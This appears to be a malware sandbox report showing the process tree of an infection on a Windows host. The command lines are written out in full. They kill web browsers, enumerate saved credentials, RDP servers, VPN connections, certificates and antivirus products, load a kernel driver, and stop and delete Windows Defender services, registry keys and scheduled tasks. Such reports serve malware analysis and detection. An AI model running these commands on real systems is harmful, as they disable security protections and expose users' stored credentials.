C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=42816 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3060,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:18⤵
- Uses browser remote debugging
PID:4820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4892,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:88⤵PID:528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --no-sandbox --mute-audio --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4992,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4988 /prefetch:88⤵PID:4612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5100,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5096 /prefetch:88⤵PID:1280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5100,i,12759685001888627396,15283149225766972306,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5096 /prefetch:88⤵PID:216
-
-
-
C:\Windows\system32\tasklist.exe"tasklist" /FI "IMAGENAME eq msedge.exe"7⤵
- Enumerates processes with tasklist
PID:3856
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe7⤵
- Kills process with taskkill
PID:6032
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM chrome.exe7⤵
- Kills process with taskkill
PID:5736
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM msedge.exe7⤵
- Kills process with taskkill
PID:5536
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM brave.exe7⤵PID:5500
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM opera.exe7⤵
- Kills process with taskkill
PID:716
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM vivaldi.exe7⤵
- Kills process with taskkill
PID:2172
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM firefox.exe7⤵
- Kills process with taskkill
PID:2412
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM dragon.exe7⤵
- Kills process with taskkill
PID:4708
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM maxthon.exe7⤵
- Kills process with taskkill
PID:4308
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM uc_browser.exe7⤵
- Kills process with taskkill
PID:1072
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM slimjet.exe7⤵PID:5088
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM cent_browser.exe7⤵
- Kills process with taskkill
PID:2404
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM epic.exe7⤵
- Kills process with taskkill
PID:1704
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM torch.exe7⤵
- Kills process with taskkill
PID:2584 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3856
-
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM whale.exe7⤵
- Kills process with taskkill
PID:2552
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM 360browser.exe7⤵
- Kills process with taskkill
PID:5856
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM qqbrowser.exe7⤵PID:436
-
-
C:\Windows\system32\taskkill.exe"taskkill" /IM browser.exe7⤵
- Kills process with taskkill
PID:3688
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM chrome.exe7⤵
- Kills process with taskkill
PID:5652
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM msedge.exe7⤵
- Kills process with taskkill
PID:3108
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM brave.exe7⤵
- Kills process with taskkill
PID:4836
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM opera.exe7⤵
- Kills process with taskkill
PID:5020
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM vivaldi.exe7⤵PID:1936
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM firefox.exe7⤵
- Kills process with taskkill
PID:4040
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM dragon.exe7⤵PID:4764
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM maxthon.exe7⤵
- Kills process with taskkill
PID:3608
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM uc_browser.exe7⤵
- Kills process with taskkill
PID:3484
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM slimjet.exe7⤵
- Kills process with taskkill
PID:4988
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM cent_browser.exe7⤵
- Kills process with taskkill
PID:5508
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM epic.exe7⤵
- Kills process with taskkill
PID:4712
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM torch.exe7⤵
- Kills process with taskkill
PID:3648
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM whale.exe7⤵
- Kills process with taskkill
PID:4804
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM 360browser.exe7⤵
- Kills process with taskkill
PID:4564
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM qqbrowser.exe7⤵
- Kills process with taskkill
PID:4872
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM browser.exe7⤵
- Kills process with taskkill
PID:4908
-
-
C:\Windows\system32\vaultcmd.exe"vaultcmd" /list7⤵PID:2828
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list7⤵PID:5632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5316 -
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list8⤵PID:3036
-
-
-
C:\Windows\system32\certutil.exe"certutil" -store My7⤵PID:380
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My7⤵PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "7⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
PID:5728
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list7⤵PID:4824
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.747⤵PID:3620
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List7⤵PID:2304
-
-
C:\Windows\system32\hostname.exe"hostname"7⤵PID:3244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5408
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List7⤵PID:4472
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5088
-
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall show allprofiles state7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5464
-
-
-
C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ADA5.tmp\ADA6.tmp\ADA7.bat C:\Users\Admin\AppData\Local\Temp\261.exe"8⤵PID:1308
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1880 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE8F.tmp\AE90.tmp\AE91.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"10⤵
- Drops file in Program Files directory
PID:2944 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:4816
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:2564
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:5520
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4056
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:2952
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5028
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4768
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:3460
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:1460
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:3652
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵PID:2068
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:2160
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:4032
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:2844
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵PID:4040
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:3108
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:5832
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:2756
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:5776
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:5192
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:4596
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵PID:4652
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵PID:4772
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵PID:4524
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:4752
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:1980
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵PID:3664
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:5984
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:1696
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:1440
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:5408
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:432
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:880
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:224
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:1932
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:868
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:5412
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:5176
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:3728
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:1280
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:4264
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:1156
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:1588
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:5780
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:4744
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:876
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:4776
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:5140
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:4764
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:744
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:3976
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:688
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:1840
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:5380
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:4724
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:5012
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:6096
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:4380
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:1704
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:2040
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:1248
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ADD4.tmp\ADD5.tmp\ADD6.bat C:\Users\Admin\AppData\Local\Temp\261.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2412 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE80.tmp\AE81.tmp\AE82.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"10⤵
- Drops file in Program Files directory
PID:1612 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:3068
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:4264
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:3620
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:2152
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:4268
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1608
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5380
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:4724
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵PID:1304
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵PID:2700
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:4380
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵PID:4132
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵PID:6032
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:2176
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:1752
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵PID:3376
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:1920
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:3640
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵PID:3056
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:404
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵PID:5652
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:4584
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:4604
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵PID:5040
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵PID:4736
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:4576
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
PID:3940
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵PID:1220
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
PID:4980
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:4548
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵PID:5164
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:5336
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:4692
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵PID:5500
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:4716
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:3500
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵PID:4960
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:4428
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:4708
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵PID:4556
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:1020
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:4812
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵PID:4636
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:2384
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵PID:5352
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵PID:4868
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:4308
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:5976
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵PID:3620
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵PID:4528
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:4064
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵PID:1092
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:3864
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:2108
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵PID:5436
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵PID:1812
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵PID:916
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵PID:6040
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵PID:2660
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:2068
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵PID:2496
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10413350101\772224823d.exe"C:\Users\Admin\AppData\Local\Temp\10413350101\772224823d.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5284 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10413350101\772224823d.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3112
-
-
-
C:\Users\Admin\AppData\Local\Temp\10413360101\250ab1997b.exe"C:\Users\Admin\AppData\Local\Temp\10413360101\250ab1997b.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4912 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10413360101\250ab1997b.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2884
-
-
-
C:\Users\Admin\AppData\Local\Temp\10413370101\bf63e36e97.exe"C:\Users\Admin\AppData\Local\Temp\10413370101\bf63e36e97.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5424
-
-
C:\Users\Admin\AppData\Local\Temp\10413380101\d8bc43181b.exe"C:\Users\Admin\AppData\Local\Temp\10413380101\d8bc43181b.exe"6⤵
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks processor information in registry
PID:748 -
C:\Users\Admin\AppData\Local\Chel3raiO6Ri.exe"C:\Users\Admin\AppData\Local\Chel3raiO6Ri.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5444
-
-
C:\Users\Admin\AppData\Local\1Uk2RJcLqabN.exe"C:\Users\Admin\AppData\Local\1Uk2RJcLqabN.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1752
-
-
-
C:\Users\Admin\AppData\Local\Temp\10413390101\8726cdeb67.exe"C:\Users\Admin\AppData\Local\Temp\10413390101\8726cdeb67.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6132 -
